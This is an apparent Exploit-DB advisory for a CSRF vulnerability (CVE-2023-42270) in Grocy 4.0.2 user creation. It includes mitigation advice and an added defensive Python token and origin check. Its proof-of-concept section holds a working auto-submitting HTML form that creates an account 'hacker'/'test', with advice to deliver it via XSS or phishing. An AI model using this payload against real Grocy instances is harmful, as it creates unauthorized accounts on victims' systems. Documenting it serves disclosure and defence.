Vendor: Grocy
By: Chance Proctor
CVSS: 7.1 (HIGH)
CWE: 352 (CSRF)
Product Name: Grocy
Affected Version From: 4.0.0
Affected Version To: 4.0.2
Patch Exists: NO
Related CVE: CVE-2023-42270
CPE: a:grocy:grocy:4.0.2
Metasploit:
Other Scripts:
Platforms Tested: Linux
Year: 2023

Grocy <= 4.0.2 CSRF Vulnerability

In Grocy version 4.0.2, there is a Cross-Site Request Forgery (CSRF) vulnerability when creating a new user. Because the user-creation endpoint requires neither a CSRF token nor any other verification of where the request originates, an attacker can craft a request in JSON format that creates a new user, relying on the permissions of the logged-in target user.

Mitigation:

To mitigate this vulnerability, implement proper CSRF tokens and verification mechanisms in the user creation process to prevent unauthorized requests.
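The following is an added defensive example, not code from Grocy or from the advisory author: a server-side check for a user-creation request that combines an Origin/Referer check, a JSON-only content-type requirement (an HTML form cannot send application/json without a CORS preflight), and a synchronizer token bound to the session. The request/session dictionaries, the header name X-CSRF-Token and the app origin are assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed value: the origin the Grocy instance is served from (assumption).
APP_ORIGIN = "https://grocy.example.test"


def issue_csrf_token(session):
    """Bind a fresh random token to the logged-in session (synchronizer token)."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def check_user_creation_request(request, session):
    """Decide whether a POST to /api/users may proceed.

    request: {"headers": {...}, "content_type": str, "body": {...}}  (hypothetical shape)
    session: the server-side session matching the cookie the browser attached.
    Returns (allowed, reason) so rejections can be logged by the caller.
    """
    headers = {k.lower(): v for k, v in request["headers"].items()}

    # 1. Source check: browsers set Origin on cross-site POSTs. Reject anything
    #    that is not the app's own origin (fall back to Referer if Origin is absent).
    source = headers.get("origin") or headers.get("referer")
    if source is None:
        return False, "missing Origin/Referer"
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != APP_ORIGIN:
        return False, f"cross-site source {source}"

    # 2. JSON-only API: a plain <form> can only send form-urlencoded, multipart or
    #    text/plain, so requiring application/json blocks form-based submissions.
    if request["content_type"].split(";")[0].strip() != "application/json":
        return False, "unexpected Content-Type"

    # 3. Synchronizer token: must be present and match the token stored in the
    #    session; compare in constant time.
    expected = session.get("csrf_token")
    supplied = headers.get("x-csrf-token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "CSRF token missing or invalid"

    return True, "ok"
```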

Exploit-DB raw data:

# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
# Application: Grocy
# Version: <= 4.0.2
# Date: 09/21/2023
# Exploit Author: Chance Proctor
# Vendor Homepage: https://grocy.info/
# Software Link: https://github.com/grocy/grocy
# Tested on: Linux
# CVE : CVE-2023-42270



Overview
==================================================
When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
This makes it easy to adjust your request, since it is a known format.
There is also no CSRF token or other verification method in place to check where the request is coming from.
This allows an HTML page to create a new user as long as the target is logged in and has Create User permissions.



Proof of Concept
==================================================
Host the following HTML code via an XSS or deliver it via a phishing campaign:

	<html>
	<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
	<input name='username' value='hacker' type='hidden'>
	<input name='password' value='test' type='hidden'>
	<input type=submit>
	</form>
	<script>
	history.pushState('','', '/');
	document.forms[0].submit();
	</script>
	</html>


If a user is logged into the Grocy web app at the time of execution, a new user will be created in the app with the following credentials:

	Username: hacker
	Password: test

Note:
In order for this to work, the target must have Create User permissions.
This permission is enabled by default.



Proof of Exploit/Reproduce
==================================================
http://xploit.sh/posts/cve-2023-42270/